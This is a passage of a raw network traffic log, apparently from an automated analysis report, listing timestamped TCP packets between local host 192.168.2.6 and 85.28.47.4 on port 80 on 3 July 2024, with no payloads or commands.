                                                                Jul 3, 2024 08:38:19.646959066 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.646979094 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.647120953 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.647133112 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.647141933 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.647154093 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.647161961 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.647182941 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.647356987 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.647367954 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.647377968 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.647388935 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.647397995 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.647399902 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.647412062 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.647423983 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.647443056 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.647471905 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.647650003 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.647667885 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.647677898 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.647689104 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.647689104 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.647708893 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.647711039 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.647722006 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.647732973 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.647737980 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.647742987 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.647753000 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.647759914 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.647763968 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.647773981 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.647797108 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.647826910 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.648233891 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.648243904 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.648257017 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.648276091 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.648294926 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.648489952 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.648507118 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.648516893 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.648528099 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.648529053 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.648538113 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.648549080 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.648551941 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.648560047 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.648570061 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.648580074 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.648580074 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.648591042 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.648597002 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.648602009 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.648612022 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.648622990 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.648627996 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.648632050 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.648643017 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.648653984 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.648677111 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.648998976 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.649041891 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.649085045 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.649096012 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.649106026 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.649123907 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.649147987 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.649235964 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.649252892 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.649262905 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.649274111 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.649277925 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.649283886 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.649293900 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.649293900 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.649305105 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.649315119 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.649322987 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.649324894 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.649336100 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.649339914 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.649346113 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.649355888 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.649358988 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.649370909 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.649377108 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.649382114 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.649391890 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.649391890 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.649420023 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.649446011 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.650185108 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.650196075 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.650206089 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.650218964 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.650228977 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.650232077 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.650239944 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.650252104 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.650260925 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.650262117 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.650271893 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.650278091 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.650283098 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.650293112 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.650302887 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.650306940 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.650314093 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.650326014 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.650333881 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.650336027 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.650346994 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.650347948 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.650357962 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.650377989 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.650403976 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.651041985 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.651052952 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.651063919 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.651073933 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.651087046 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.651094913 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.651097059 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.651108027 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.651117086 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.651123047 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.651128054 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.651138067 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.651138067 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.651149035 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.651154041 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.651159048 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.651169062 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.651179075 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.651186943 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.651190042 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.651201010 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.651211023 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.651213884 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.651247978 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.651247978 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.651844978 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.651855946 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.651865005 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.651875973 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.651885986 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.651890039 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.651896954 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.651906967 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.651916027 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.651917934 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.651936054 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.651952028 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.733470917 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.733513117 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.733531952 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.733532906 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.733547926 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.733562946 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.733580112 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.733596087 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.733623028 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.733624935 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.733658075 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.733730078 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.733741045 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.733758926 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.733767986 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.733787060 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.733807087 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.733901024 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.733912945 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.733923912 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.733935118 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.733943939 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.733946085 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.733954906 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.733987093 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.734163046 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.734175920 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.734186888 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.734198093 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.734205008 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.734209061 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.734220028 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.734220028 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.734251022 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.734435081 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.734447002 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.734457970 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.734469891 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.734476089 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.734481096 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.734492064 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.734509945 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.734543085 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.734718084 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.734728098 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.734739065 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.734755039 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.734766006 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.734776020 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.734776974 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.734787941 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.734798908 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.734808922 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.734812021 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.734828949 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.734844923 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.735279083 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.735290051 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.735301018 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.735311985 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.735322952 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.735332966 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.735343933 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.735354900 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.735367060 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.735368013 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.735377073 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.735388994 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.735390902 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.735399961 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.735410929 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.735413074 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.735421896 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.735428095 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.735466957 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.735929012 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.735940933 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.735950947 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.735963106 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.735964060 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.735972881 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.735979080 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.735985041 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.735995054 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.735997915 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.736006975 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.736017942 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.736025095 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.736041069 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.736066103 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.736479044 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.736496925 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.736506939 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.736519098 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.736524105 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.736531019 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.736534119 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.736541033 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.736552000 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.736562967 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.736567974 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.736572981 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.736582994 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.736582994 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.736593962 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.736599922 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.736603975 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.736614943 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.736617088 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.736625910 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.736641884 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.736649036 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.736653090 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.736665010 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.736677885 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.736696005 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.737406015 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.737418890 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.737431049 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.737442970 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.737453938 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.737461090 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.737464905 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.737477064 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.737478971 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.737490892 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.737499952 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.737502098 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.737513065 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.737519979 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.737524033 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.737534046 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.737540007 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.737546921 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.737551928 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.737561941 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.737572908 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.737577915 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.737584114 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.737593889 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.737595081 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.737612009 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.737629890 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.738229990 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.738243103 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.738253117 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.738264084 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.738274097 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.738279104 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.738284111 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.738295078 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.738305092 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.738306046 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.738317966 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.738327980 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.738343954 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.738368034 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.790718079 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.795628071 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.965508938 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.965528011 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.965538979 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.965552092 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.965563059 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.965573072 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.965584993 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.965620995 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.965621948 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.965632915 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.965643883 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.965655088 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.965687990 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.965713024 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.965812922 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.965856075 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.965897083 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.965908051 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.965924025 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.965930939 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.965934038 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.965945005 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.965948105 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.965955019 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:19.965971947 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:19.965998888 CEST4971080192.168.2.685.28.47.4
